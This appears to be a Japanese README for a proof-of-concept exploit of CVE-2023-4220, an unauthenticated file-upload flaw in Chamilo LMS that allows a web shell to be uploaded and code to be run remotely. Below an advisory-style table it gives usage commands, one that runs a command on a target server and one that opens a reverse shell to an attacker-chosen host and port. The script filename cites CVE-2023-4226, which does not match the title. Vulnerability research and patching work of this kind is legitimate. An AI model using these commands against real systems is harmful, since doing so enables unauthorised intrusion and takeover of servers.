
CVE-2023-4220 - Chamilo LMS 未認証大容量ファイルアップロードによるリモートコード実行のPoC
CVE-2023-4220 の詳細: StarLabs Advisory
| 製品 | Chamilo |
|---|---|
| ベンダー | Chamilo |
| 深刻度 | 高 - 攻撃者はソフトウェアの脆弱性を悪用して、認証なしのリモートコード実行を達成する可能性があります。 |
| 影響を受けるバージョン | <= v1.11.24 |
| テスト済みバージョン | v1.11.24 (執筆時点の最新版) |
| CVE 識別子 | CVE-2023-4220 |
| CVE 説明 | Chamilo LMS <= v1.11.24 の /main/inc/lib/javascript/bigupload/inc/bigUpload.php における大容量ファイルアップロード機能の無制限ファイルアップロードにより、未認証の攻撃者が Web シェルをアップロードして、保存型クロスサイトスクリプティング攻撃を実行し、リモートコード実行を達成できる可能性があります。 |
| CWE 分類 | CWE-434: 危険なタイプのファイルの無制限アップロード |
| CAPEC 分類 | CAPEC-650: Web サーバーへの Web シェルのアップロード |
コマンドを直接実行するには、次のコマンドを使用します:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
リバースシェルを取得するには、次のコマンドを使用します:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>